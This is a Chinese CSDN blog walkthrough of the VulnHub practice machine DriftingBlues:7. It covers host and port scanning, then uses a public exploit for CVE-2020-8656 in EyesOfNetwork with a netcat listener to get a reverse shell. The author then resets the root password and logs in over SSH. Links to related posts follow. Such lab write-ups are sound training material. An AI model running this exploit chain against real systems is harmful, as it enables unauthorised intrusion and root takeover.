vulnhub靶机：driftingblues7

最新推荐文章于 2024-11-06 09:27:30 发布

不言君

最新推荐文章于 2024-11-06 09:27:30 发布

阅读量295

点赞数 5

文章标签： linux

本文链接：https://blog.csdn.net/waitagirl/article/details/136890031

版权

本文详细描述了使用KaliLinux进行信息收集，包括ARP扫描主机、端口扫描并发现CVE-2020-8656漏洞的过程。随后进行渗透测试，通过exploit获取执行权限，修改root密码，以及利用SSH连接靶机获取flag。

摘要由CSDN通过智能技术生成

一：信息收集

1：主机发现

arp-scan -I eth0 10.9.23.0/24

kali的ip：10.9.23.112

靶机ip：10.9.23.93

2：端口扫描

nmap -A -p- -T4 10.9.23.93

开放了22，66，80，443，3306端口

3：端口探测

访问66端口，因为是上面运行了SimpleHttpServer

访问80端口，发现一个登录界面，来百度搜索Eyes of network发现可以利用的exp

漏洞编号

CVE-2020-8656

找到一个可以利用的漏洞克隆到kali

GitHub - h4knet/eonrce: EyesOfNetwork 5.1 to 5.3 exploits

git clone GitHub - h4knet/eonrce: EyesOfNetwork 5.1 to 5.3 exploits

二：渗透测试

赋予执行权限

chmod +x eonrce.py

在Kali 开启监听

nc -lvvp 6666

运行脚本：

./eonrce.py https://10.9.23.93 -ip 10.9.23.112 -port 6666

修改root的密码passwd root

由之前扫描发现开了ssh服务，我们用 ssh 连接靶机

ssh 10.9.23.93

发现最后flag

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

不言君

关注关注

5
点赞
踩
4

收藏

觉得还不错? 一键收藏
1
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

vulnhub靶机DriftingBlues: 2渗透笔记

liver100day的博客

07-26

962

文章目录环境准备1. 信息收集1.1 主机发现1.2 端口扫描1.3 访问80端口（http服务）2.漏洞利用2.1 ftp匿名登录漏洞2.2 爆破目录环境准备靶机环境搭建攻击渗透机： kali IP地址：192.168.33.128 靶机：DC-7 IP地址未知靶机下载地址：https://www.vulnhub.com/entry/driftingblues-2,634/ 1. 信息收集 1.1 主机发现使用arp-scan -l获取目标靶机IP地址 arp-scan -l 扫描局域网所有设备

vulnhub靶机 | DriftingBlues:7 write-up

xj28555的博客

05-04

8349

靶机下载地址:https://www.vulnhub.com/entry/driftingblues-7,680/ 题目的目标是要夺到里面的flag，搭建好环境如图。首先用nmap扫描一下ip地址 nmap-sP192.168.110.1/24#扫描网段中存活主机 nmap-p-192.168.110.167 #在看看上面运行的服务 nmap-sV192.168.110.167#查看服务版本上面运行的一些apache、...

1 条评论您还未登录，请先登录后发表或查看评论

CVE-2020-24616: Jackson 多个反序列化安全漏洞通告

爱国小白帽

08-27

4056

360CERT [三六零CERT](javascript:void(0)???? 今天报告编号：B6-2020-082701 报告来源：360CERT 报告作者：360CERT 更新日期：2020-08-27 0x01 漏洞简述 2020年08月27日，360CERT监测发现jackson-databind 发布了 jackson-databind 序列化漏洞的风险通告，该漏洞编号为 CVE-2020-24616 ，漏洞等级：高危，漏洞评分：7.5。 br.com.anteros:Anteros-DB

[Vulnhub靶机] DriftingBlues: 5

网安日记本的博客

02-13

2051

[Vulnhub靶机] DriftingBlues: 5靶机渗透思路及方法（个人分享）

Vulnhub靶机：driftingblues 7

qq_48904485的博客

01-19

448

运行环境：Virtualbox攻击机：kali（10.0.2.15）靶机：driftingblues7（10.0.2.23）目标：获取靶机root权限和flag靶机下载地址：https://www.vulnhub.com/entry/driftingblues-7,680/

[Vulnhub靶机] DriftingBlues: 7

网安日记本的博客

02-16

1550

[Vulnhub靶机] DriftingBlues: 7靶机渗透思路及方法（个人分享）

[Vulnhub靶机] DriftingBlues: 2

网安日记本的博客

02-03

2315

[Vulnhub靶机] DriftingBlues: 2靶机渗透思路及方法（个人分享）

[Vulnhub靶机] DriftingBlues: 1

网安日记本的博客

02-02

2113

[Vulnhub靶机] DriftingBlues: 1靶机渗透思路及方法（个人分享）

vulnhub靶机 | DriftingBlues:7

在下小黄的博客

06-07

1192

大家好！我是小黄，很高兴又跟大家见面啦！拒绝水文，从我做起！！！！未经允许，禁止转载，违者必究！！！！本实验仅适用于学习和测试，严禁违法操作！！！今天更新的是： vulnhub靶机 | DriftingBlues:7 靶机解题过程及思路微信公众号回复：【靶机】，即可获取本文全部涉及到的工具。创建时间：2021年6月7日软件： MindMaster Pro、kali、DriftingBlues:7靶机 DriftingBlues:7靶机解题过程及思路前言：信息搜

Vulnhub靶机：driftingblues 2

qq_48904485的博客

01-13

638

运行环境：Virtualbox攻击机：kali（10.0.2.15）靶机：driftingblues2（10.0.2.18）目标：获取靶机root权限和flag靶机下载地址：https://www.vulnhub.com/entry/driftingblues-2,634/

vulnhub靶机 | DriftingBlues:6 write-up

xj28555的博客

05-06

831

nmap -sP 192.168.110.1/24 #首先扫描存活网段扫描出靶机地址是192.168.110.169。在对其详细服务进行扫描。 nmap -sV 192.168.110.169 开着一个80端口，进行访问。发现只有一张图片，那我们只好开始CTF的套路了，扫描目录。 python3 dirsearch.py -u http://192.168.110.169/ #用dirsearch扫描目录扫到robots.txt文件，进行访问一下。有...

vulnhub--driftingblues:2

venu_s的博客

06-03

449

靶机介绍 difficult：easy goal：get flags download：https://download.vulnhub.com/driftingblues/driftingblues2.ova 信息探测主机发现端口扫描目标主机开放了21端口，有一张图片，可以匿名登陆；此外还开放了22端口和80端口访问ftp，下载图片，图片不知道有啥用，先放着 80端口目录扫描可以看出目标主机使用了WordPress，访问80端口查看源码，就是一张图片访问/blog，发现是一些博客

vulnhub--DriftingBlues:6复现超详细过程

m0_54024658的博客

06-05

432

下载靶机并且导入VMware masscan扫描存活主机，发现目标靶机192.168.152.225，并且开启了80端口 masscan -p80 192.168.152.0/24 --rate=2000 访问靶机的80端口，查看原代码，没有什么发现，想办法找页面的文件目录 ==Nmap -p- -sC -sV 192.168.152.225 --min-rate=2000 -vv == 详细扫描IP，发现了一个文件robots.txt，访问一下。访问robots.txt文件发现一个目录，和提示目录

【Linux】进程状态相关知识详细梳理

fulufulucode的博客

11-03

710

可以看到，子进程退出后，父进程没有进行资源回收（调用wait()）,子进程的状态就会变成“Z+”，其中Z表示僵尸状态，+表示进程属于前台进程的一部分。每个僵尸进程在进程表中保留一个条目，系统的进程表是有限的。如果僵尸进程数量过多，可能会导致进程表满，新的进程无法创建。fork函数“有两个返回值”，父进程会返回子进程的pid，子进程会返回0，于此同时，子进程会继承父进程的代码以及数据（所有运行在系统里的进程都以task_struct链表的形式存在内核里，也可以称为进程表。那么如果父进程先退出呢？

Linux初阶——线程（Part3）：POSIX 信号量 & CP 模型变体

m0_73093743的博客

11-02

489

只能建立一个对象的设计模式。

[linux 驱动]PWM子系统详解

weixin_49406449的博客

11-04

844

搜索“rockchip,rk3328-pwm”，发现在./drivers/pwm/pwm-rockchip.c 出现，所以 pwm6 的驱动是pwm-rockchip。任何 PWM 设备实例都可以被注册到 pwm_class 下，用户空间应用可以通过 /sys/class/pwm 访问这些设备，实现对 PWM 功能的控制。struct pwm_device *pwm: 这是指向 PWM 设备结构体的指针，该结构体是在调用 pwm_request 函数时获取的。这是指向该控制器的 PWM 通道的数组或链表。

Linux kernel 源码下载与源码在线阅读地址及其相关资源网站

最新发布

代码背包客的博客

11-06

254

Linux内核源码的下载地址和在线阅读方式有多种，下面是一些与之相关的网址。同时也包含一些与kernel相关的一些资源网站，供大家参考学习！

Linux——Linux基础指令

辰多代码的博客

11-05

724

比 more 更强大的分页器，支持前后翻页和搜索。1：移动文件或目录（前提是目标文件或目录不存在）。：重命名文件或目录（前提是目标文件或目录存在）。:：显示系统上当前登录的用户及其相关信息。：显示网络连接、路由表和网络接口统计信息。：统计文件的行数、字数和字节数。：显示当前工作目录的完整路径。：列出目录中的文件和子目录。：显示或设置系统日期和时间。：在目录层次结构中搜索文件。：显示系统中正在运行的进程。：配置或显示网络接口信息。：显示当前用户的用户名。：更新现有文件的时间戳。：查找可执行文件的位置。

Linux 之信号概念、进程、进程间通信、线程、线程同步

挥剑决浮云的博客

11-01

712

如果释放互斥锁时有一个以上的线程阻塞，那么这些阻塞的线程会被唤醒，它们都会尝试对互斥锁进行加锁，当有一个线程成功对互斥锁上锁之后，其它线程就不能再次上锁了，只能再次陷入阻塞，等待下一次解锁。事实上，子进程是父进程的一个副本，譬如子进程拷贝了父进程的数据段、堆、栈以及继承了父进程打开的文件描述符，父进程与子进程并不共享这些存储空间，这是子进程对父进程相应部分存储空间的完全复制，执行fork()之后，每个进程均可修改各自的栈数据以及堆段中的变量，而并不影响另一个进程。是一族函数，而不是一个单独的函数。

vulnhub靶机系列：

09-09

关于Vulnhub靶机系列，我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台，提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞，供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub...